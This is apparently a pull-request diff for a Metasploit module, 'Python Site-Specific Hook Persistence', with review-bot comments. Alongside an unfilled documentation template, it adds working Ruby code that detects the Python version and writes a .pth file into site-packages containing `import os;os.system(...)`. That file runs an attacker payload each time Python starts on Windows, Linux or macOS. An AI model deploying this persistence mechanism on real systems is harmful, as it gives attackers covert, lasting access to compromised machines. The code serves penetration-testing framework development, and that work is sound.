Changes from 5 commits
@@ -0,0 +1,44 @@
The following is the recommended format for module documentation. But feel free to add more content/sections to this.
One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop
functioning in 5+ years, so giving links or specific examples can be VERY helpful.

## Vulnerable Application

Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
files, as well as instructions on installing/configuring the environment if it is different than a
standard install. Much of this will come from the PR, and can be copy/pasted.

## Verification Steps
Example steps in this format (is also in the PR):

1. Install the application
1. Start msfconsole
1. Do: `use [module path]`
1. Do: `run`
1. You should get a shell.

## Options
List each option and how to use it.

### Option Name

Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.

## Scenarios
Specific demo of using the module that might be useful in a real world scenario.

### Version and OS

```
code or console output
```

For example:

To do this specific thing, here's how you do it:

```
msf > use module_name
msf auxiliary(module_name) > set POWERLEVEL >9000
msf auxiliary(module_name) > exploit
```
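Review bot: this documentation file is still the unfilled template. The intro paragraph and the `## Vulnerable Application`, `## Verification Steps`, `## Options` and `## Scenarios` sections all carry the placeholder instructions, and the console example still shows `use module_name` and `set POWERLEVEL >9000`. If this file is meant to document the module added in this change, replace the placeholders with the real module path in the `use` step, the Python versions and platforms it was tested on, and a captured console run under a concrete `### Version and OS` heading. The module reads `PAYLOAD_NAME` from the datastore, so that option belongs under `## Options`, and the `.pth` file the module writes into `site-packages` should be named in the text so that someone troubleshooting or cleaning up later knows which artifact to look for.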
89 changes: 89 additions & 0 deletions modules/exploits/multi/persistence/python_site_specific_hook.rb
@@ -0,0 +1,89 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

include Msf::Post::Linux::Priv
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Local::Persistence
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Python Site-Specific Hook Persistence',
'Description' => %q{
TODO
},
'License' => MSF_LICENSE,
'Author' => [
'msutovsky-r7', # msf module
],
'Platform' => ['linux', 'windows', 'osx'],
'Arch' => [ ARCH_CMD ],
'SessionTypes' => [ 'meterpreter', 'shell' ],
'Targets' => [[ 'Auto', {} ]],
'References' => [
[ 'URL', 'https://docs.python.org/3/library/site.html'],
# TODO
['ATT&CK', Mitre::Attack::Technique::T1547_013_XDG_AUTOSTART_ENTRIES], # https://github.com/rapid7/metasploit-framework/pull/20289
],
# TODO
'DisclosureDate' => '2023-11-29',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
end

def get_hooks_path
case session.platform
when 'windows', 'win'
@hooks_path = "C:/Python#{@python_version.sub('.', '')}/Lib/site-packages/"
when 'osx', 'linux'
@hooks_path = expand_path("$HOME/.local/lib/python#{@python_version}/site-packages/")
end
end

def get_python_version
case session.platform
when 'windows', 'win'
cmd_exec('cmd.exe', '/c python3.exe --version 2> nul || python2.exe --version 2> nul|| python.exe --version 2> nul') =~ /(\d+.\d+).\d+/
when 'osx', 'linux'
cmd_exec('python3 --version 2>/dev/null || python2 --version 2> /dev/null || python --version 2>/dev/null') =~ /(\d+.\d+).\d+/
end

@python_version = Regexp.last_match(1)
end

def check
get_python_version

return CheckCode::Safe('Python not present on the system') unless @python_version

CheckCode::Vulnerable('Python is present on the system')
end

def install_persistence
get_python_version unless @python_version
get_hooks_path unless @hooks_path

file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)

if session.platform == 'osx' || session.platform == 'linux'
cmd_exec("mkdir -p #{@hooks_path}")
end

fail_with(Failure::PayloadFailed, 'Failed to create malicious hook') unless write_file("#{@hooks_path}#{file_name}.pth", %(import os;os.system("#{payload.encoded}") ))
end
end
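Review bot: `install_persistence` builds the target path without checking that `@python_version` and `@hooks_path` were resolved. It calls `get_python_version` itself rather than relying on `check`, and that method leaves `@python_version` nil when the regex does not match; on Windows `@python_version.sub('.', '')` then raises on nil, and on Linux/OSX the path becomes `python/site-packages/`. `get_hooks_path` also has no `else` branch, so an unmatched `session.platform` leaves `@hooks_path` nil and `write_file` receives a bare relative file name. Suggest a `fail_with` for each nil case before the `mkdir -p` and `write_file` calls. In `get_python_version`, the dots in `/(\d+.\d+).\d+/` are unescaped and match any character; `\.` is what is intended. Metadata also needs finishing before merge: `'Description'` is `TODO`, the ATT&CK reference `T1547_013_XDG_AUTOSTART_ENTRIES` names XDG autostart entries rather than a Python site-packages hook, and its trailing comment points at a pull request URL. `datastore['PAYLOAD_NAME']` is read but no option registration is visible in this file, so add it to `register_options` unless the Persistence mixin already defines it. `Msf::Post::Linux::Priv`, `Msf::Exploit::EXE` and `Msf::Exploit::FileDropper` are included but nothing in the visible code uses them, and the written `.pth` file is never registered for cleanup.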